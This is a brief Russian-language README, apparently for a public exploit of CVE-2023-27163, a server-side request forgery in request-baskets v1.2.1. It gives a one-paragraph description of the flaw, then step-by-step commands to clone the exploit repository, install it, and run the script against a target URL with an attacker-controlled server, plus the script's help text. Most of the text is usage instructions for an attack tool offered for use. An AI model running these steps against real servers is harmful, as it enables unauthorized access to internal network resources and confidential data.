
CVE-2023-27163 Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
Request-Baskets v1.2.1 - подделка серверных запросов (SSRF)
В request-baskets до версии v1.2.1 была обнаружена подделка серверных запросов (SSRF) через компонент /api/baskets/{name}. Эта уязвимость позволяет злоумышленникам получать доступ к сетевым ресурсам и конфиденциальной информации с помощью специально сформированного API-запроса.
git clone https://github.com/0xFTW/CVE-2023-27163
cd CVE-2023-27163
pip3 install -r requirements.txt
python3 CVE-2023-27163.py url attack_server
Скрипт эксплуатации Request Baskets
позиционные аргументы:
url основной путь (/) сервера (например, http://127.0.0.1:5000/)
attack_server ATTACK_SERVER
опции:
-h, --help показать эту справку и выйти